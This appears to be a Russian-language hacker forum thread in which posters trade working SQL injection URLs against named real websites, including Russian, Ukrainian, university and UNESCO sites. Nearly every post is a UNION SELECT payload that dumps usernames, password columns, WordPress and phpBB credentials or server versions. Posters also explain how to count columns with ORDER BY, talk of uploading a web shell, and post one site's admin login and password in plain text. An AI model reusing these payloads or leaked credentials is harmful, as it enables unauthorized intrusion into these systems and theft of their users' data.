reel-stream.com Code: http://www.reel-stream.com/headline.php?id=-1+union+select+concat(email,0x3a,password),2,3,4+from+user/* пароли в чистом виде
Вывод всех таблиц Code: http://opticalnet.ru/articles.phtml?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables/* Хы, какие мы имеем права Code: http://opticalnet.ru/articles.phtml?id=-1+union+select+1,column_name,3,4,5+from+information_schema.columns+where+table_name='user'+limit+1,50/* Сейчас шеллик зальем =)
www.equipnet.ru Code: http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+convert(concat_ws(0x3b,user(),database(),version())+using+cp1251)/*
до 15 дошел. дальше не пробовал http://astrol.ru/index.php?page=125'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* хотя как я понял конструкция ордер бай действует так: если больше например 15 столбцов - мы получаем корректный ответ. если меньше - ошибку. ну вот http://astrol.ru/index.php?page=125'+order+by+15/*
Code: http://astrol.ru/index.php?page=125+order+by+7/* Code: http://astrol.ru/index.php?page=125+order+by+8/* при 8 ошибка, значит столбцов меньше, чем 8 при 7 нет ошибки, значит столбцов 7, логично? Code: http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,5,6,7/* rtfm ps: опережая следующий вопрос: вывод в 5ку... ошибка при выводе 'version()' как выяснилось, несоответствие кодировок. http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,convert(version()+using+cp1251),6,7/* pps: гм... http://astrol.ru/forum/admin/ инсталляшка Phorum'а)
www.sacr.sk Code: http://sacr.sk/article?id=-1+union+select+concat_ws(0x3b,user(),database(),version()),2/*&category=&lang=ru
2Barney ну и собственно сам админ Code: http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,concat(username,char(48),user_password),6,7+from+phpbb_users+limit+1,1/*
http://www.databasepublish.com/ Code: http://www.databasepublish.com/news.php?id=-51+union+select+1,version(),user(),4,5,6,7,8,9,10,11+from+users/* И даже есть доступ к таблице users! Но password вывадить решительно отказывается. Кидает на index. http://www.grid.iu.edu/ Code: http://www.grid.iu.edu/news/news.php?id=-68+union+select+1,2,user(),4,version(),6,7,8/* Ну и так, по мелочи: Code: http://www.insanelygreatmac.com/news.php?id=-3571+union+select+concat(user(),1,version())/* http://www.simonv.com/music/release.php?id=-78+union+select+concat(user(),version())/* http://www.kaldor.com/media-release.php?id=-5+union+select+concat(user(),version())/*
http://canadatype.com/showfont.php?id=-1+union+select+version(),2,3,4,5,6/* http://www.big6.com/showenewsarticle.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*
sql Би-2 (оф. сайт группы) http://www.bdva.ru/ -> версия - пятерка названия всех табличек и колонок выводятся без лимита посредством запроса: -> есть форум phpbb_users. Есть еще табличка, где фигурируют пароли - radio_users
www.stanford.edu version() - 5 Code: http://www.stanford.edu/group/irepp/cgi-bin/event-detail-popup.php?recordID=-1+union+select+1,concat_ws(0x3b,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/* honors.uoregon.edu Code: http://honors.uoregon.edu/faculty/profiles/index.php?id=-12'+union+select+1,2,3,4,5,concat_ws(0x3b,user(),database(),version()),7,8,9,10,'Mafia%20Of%20Antichat',12,13,14,15,16/*
Помогите подобрать название таблицы с юзерам(админом) плиз! Code: http://sexsihop.in.ua/detail.php?detail=-1+union+select+1,2,3,4,5,6,7,8
Чёт, сёня не прёт. Code: http://www.big6.com/showarticle.php?id=-415+union+select+concat(user(),version()),2,3,4,5/* http://www.pimpsurveys.com/view-survey.php?id=737+union+select+1,user(),version(),database()/* - в самом низу.
http://www.crim.ncsu.edu/ Code: http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x203a20,name,pwd),17+from+user/* http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x203a20,user_login,user_pass),1+from+wp_users+limit+0,2/*
Code: http://women.unesco.kz/base.php?id=-2+union+select+concat(login,char(58),pwd)+from+users+limit+0,1/*
Code: http://intercar.com.ua/index.php?id=-20+union+select+1,2,concat_ws(0x3b20,user(),database(),version()),4,5,6/*
Сайт: pec.spb.ru http://www.pec.spb.ru/dictionary/?id=-218+union+select+1,concat_ws(char(58),name,password,email),3+from+users+limit+8,1/*
adm http://pec.spb.ru/admin/ login: kos pass: s11111 --------------------------------------------------------------------------- http://sexshop.in.ua/detail.php?detail=-1+union+select+1,2,3,concat_ws(0x3a,name,email,icq,phone),5,6,7,8+from+clients+limit+1,1/*
Code: http://besoch.com/?p=viewsoch&autor=tvardovsky&id=-13+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3/* =\
пошу помогите подобрать название таблицы http://www.allaboutjazz.com/php/article.php?id=-1+union+sele ct+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/*